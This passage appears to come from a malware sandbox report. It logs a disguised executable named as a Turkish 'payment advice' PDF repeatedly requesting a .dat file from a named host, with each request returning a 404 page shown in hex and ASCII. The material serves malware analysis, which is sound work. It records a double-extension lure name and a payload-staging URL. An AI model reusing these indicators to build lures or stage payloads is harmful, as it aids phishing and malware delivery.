      date: Mon, 16 Dec 2024 13:18:21 GMT
      vary: User-Agent
      2024-12-16 13:18:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      21192.168.2.749792185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:23 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:23 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:23 GMT
      vary: User-Agent
      2024-12-16 13:18:23 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      22192.168.2.749796185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:25 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:25 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:25 GMT
      vary: User-Agent
      2024-12-16 13:18:25 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      23192.168.2.749802185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:27 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:27 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:27 GMT
      vary: User-Agent
      2024-12-16 13:18:27 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      24192.168.2.749808185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:28 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:29 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:29 GMT
      vary: User-Agent
      2024-12-16 13:18:29 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      25192.168.2.749813185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:30 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:31 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:31 GMT
      vary: User-Agent
      2024-12-16 13:18:31 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      26192.168.2.749819185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:32 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:33 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:33 GMT
      vary: User-Agent
      2024-12-16 13:18:33 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      27192.168.2.749824185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:34 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:35 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:34 GMT
      vary: User-Agent
      2024-12-16 13:18:35 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      28192.168.2.749829185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:36 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:36 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:36 GMT
      vary: User-Agent
      2024-12-16 13:18:36 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      29192.168.2.749833185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:38 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:38 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:38 GMT
      vary: User-Agent
      2024-12-16 13:18:38 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      30192.168.2.749840185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:40 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:40 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:40 GMT
      vary: User-Agent
      2024-12-16 13:18:40 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      31192.168.2.749845185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:42 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:42 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:42 GMT
      vary: User-Agent
      2024-12-16 13:18:42 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      32192.168.2.749851185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:43 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:44 GMT
      vary: User-Agent
      2024-12-16 13:18:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      33192.168.2.749856185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:45 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:46 GMT
      vary: User-Agent
      2024-12-16 13:18:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      34192.168.2.749861185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:18:47 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:18:48 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:18:48 GMT
      vary: User-Agent
